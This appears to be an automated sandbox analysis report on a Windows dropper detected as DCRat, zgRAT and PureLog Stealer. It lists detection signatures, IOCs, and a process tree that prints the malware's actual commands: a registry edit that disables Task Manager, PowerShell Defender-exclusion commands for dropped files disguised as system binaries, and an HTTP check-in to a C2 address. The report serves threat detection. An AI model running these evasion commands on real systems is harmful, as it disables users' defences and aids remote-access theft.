Edit tour

Windows Analysis Report
kBY9lgRaca.exe

Overview

General Information

Sample name:	kBY9lgRaca.exe renamed because original name is a hash value
Original sample name:	3bfa5607ba2fdb912bf3c1b06950be30.exe
Analysis ID:	1533405
MD5:	3bfa5607ba2fdb912bf3c1b06950be30
SHA1:	09f81b7d75c7c337e8e25303e70f942f52a346c3
SHA256:	abb75d8cf0b557c95d295ebedcc3861cd966bb6bc53deba1d66ed6c3ec7abcde
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

kBY9lgRaca.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\kBY9lgRaca.exe" MD5: 3BFA5607BA2FDB912BF3C1B06950BE30)

wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7684 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cef_process.exe (PID: 7700 cmdline: "C:\RuntimeDll/cef_process.exe" MD5: C73DF0A231280439C24218C394E0A546)

powershell.exe (PID: 7800 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7856 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7904 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6592 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4900 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

mOBsSQwwQhAobhYfNDABCsnt.exe (PID: 576 cmdline: "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe" MD5: C73DF0A231280439C24218C394E0A546)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\RuntimeDll\cef_process.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: cef_process.exe PID: 7700	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.cef_process.exe.b10000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
8.0.cef_process.exe.b10000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\RuntimeDll\cef_process.exe, ProcessId: 7700, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\lsass.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\RuntimeDll/cef_process.exe", ParentImage: C:\RuntimeDll\cef_process.exe, ParentProcessId: 7700, ParentProcessName: cef_process.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', ProcessId: 7800, ProcessName: powershell.exe

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\RuntimeDll\cef_process.exe, ProcessId: 7700, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\lsass.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kBY9lgRaca.exe", ParentImage: C:\Users\user\Desktop\kBY9lgRaca.exe, ParentProcessId: 7260, ParentProcessName: kBY9lgRaca.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , ProcessId: 7356, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\RuntimeDll/cef_process.exe", ParentImage: C:\RuntimeDll\cef_process.exe, ParentProcessId: 7700, ParentProcessName: cef_process.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', ProcessId: 7800, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T17:23:18.164609+0200	2048095	1	A Network Trojan was detected	192.168.2.7	49898	91.199.45.187	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\RuntimeDll\cef_process.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\RuntimeDll\PBs3ExWWgPs.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\HTmgdJna.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat	Avira: detection malicious, Label: BAT/Delbat.C

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\FelIlyfv.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\QEeosldM.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\WkOFzhSS.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\cmPeMAqD.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\hiNMadse.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\jBpuMXxn.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\jWRUMqoc.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\lYDDhZsX.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\owqLTDnh.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\tFkkvTtJ.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\uqHSBmkN.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\vdXshwoU.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\ykSQugis.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\zPzZvHLt.log	ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\RuntimeDll\cef_process.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MOnylpdT.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HTmgdJna.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CNRzgtSC.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kBY9lgRaca.exe

Joe Sandbox ML: detected

Source: kBY9lgRaca.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Windows Portable Devices\07a615e8f2b317	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317	Jump to behavior

Source: kBY9lgRaca.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kBY9lgRaca.exe
Source:	Binary string: 5c561934e089\System.pdbigab source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb# source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001BA2E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7..pDb source: cef_process.exe, 00000008.00000002.1629531486.00007FFAACE40000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .0__b77a5c561934e089\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.PDB source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C803000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb_9 source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CBA69B
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CCC220
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CDB348 FindFirstFileExA,	0_2_00CDB348

Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\RuntimeDll\cef_process.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		8_2_00007FFAAC73D28D
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		24_2_00007FFAAC72D28D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49898 -> 91.199.45.187:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic

HTTP traffic detected: POST /eternalgameSqlflowerDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 91.199.45.187Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187
Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187
Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187
Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187
Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187
Source: unknown	TCP traffic detected without corresponding DNS query: 91.199.45.187

Source: unknown

Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.199.45.187
Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.199.45.187/
Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.199.45.187/eternalgameSqlflowerDownloads.php
Source: powershell.exe, 0000000A.00000002.2496024811.00000174636CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000009.00000002.2550202363.0000028365875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: cef_process.exe, 00000008.00000002.1540575609.000000000377F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp, mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.2416830415.000001FE68FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000E.00000002.2431522493.000001FE69010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co.
Source: powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
